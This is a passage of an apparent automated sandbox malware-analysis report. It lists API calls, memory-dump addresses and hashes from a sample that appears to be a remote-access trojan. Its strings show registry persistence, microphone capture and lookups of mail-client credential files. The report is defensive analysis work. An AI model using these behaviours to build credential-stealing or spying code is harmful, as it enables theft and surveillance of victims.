                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                              • String ID: @CG$exepath
                                                                                                                                                                                                                              • API String ID: 1913171305-1253070338
                                                                                                                                                                                                                              • Opcode ID: 94629b5a76b024ac5dfd140f416171875c911cd2bae1f5b7283192f046441c83
                                                                                                                                                                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94629b5a76b024ac5dfd140f416171875c911cd2bae1f5b7283192f046441c83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                              • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                              • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare
                                                                                                                                                                                                                              • String ID: `=G$x=G
                                                                                                                                                                                                                              • API String ID: 3979376653-3004145341
                                                                                                                                                                                                                              • Opcode ID: df59c76beb88092c917db78b9694a60fa3e069ca8193b9d1563ba84385e804c6
                                                                                                                                                                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df59c76beb88092c917db78b9694a60fa3e069ca8193b9d1563ba84385e804c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                              • String ID: pth_unenc$BG
                                                                                                                                                                                                                              • API String ID: 1818849710-2233081382
                                                                                                                                                                                                                              • Opcode ID: f5d5f4cec46e144fe93207e59d11bf108328240b0917a9579c7bf5bbb869924d
                                                                                                                                                                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d5f4cec46e144fe93207e59d11bf108328240b0917a9579c7bf5bbb869924d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,00000000,?,0044252A,00000000,0046DAE0,0000000C,00442681,00000000,00000002), ref: 004425F9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,00000000,?,0044252A,00000000,0046DAE0,0000000C,00442681,00000000,00000002), ref: 0044262F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                              • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0b7932fa83e9ba5eb9d653f19e166e85ee98fc69a8573f7c14dc7a35e70d7f03
                                                                                                                                                                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b7932fa83e9ba5eb9d653f19e166e85ee98fc69a8573f7c14dc7a35e70d7f03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID: P>G$dSF$pSF$|SF
                                                                                                                                                                                                                              • API String ID: 3472027048-1292307377
                                                                                                                                                                                                                              • Opcode ID: 27551664aa6236d8a9ed593a2ec01dc4af12dde1935ceeb3f2cdcae2428a7367
                                                                                                                                                                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27551664aa6236d8a9ed593a2ec01dc4af12dde1935ceeb3f2cdcae2428a7367
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00446B31
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                              • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                              • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00445359,0044B9F1,?,?,0042E9D8,?,00000008,0042EAD7,00000001,?,?,?), ref: 00446F48
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F7D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446FA4
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?), ref: 00446FB1
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?), ref: 00446FBA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                              • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                              • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2951400881-0
                                                                                                                                                                                                                              • Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                                                                                                                                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 493641738-0
                                                                                                                                                                                                                              • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                              • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100091D0
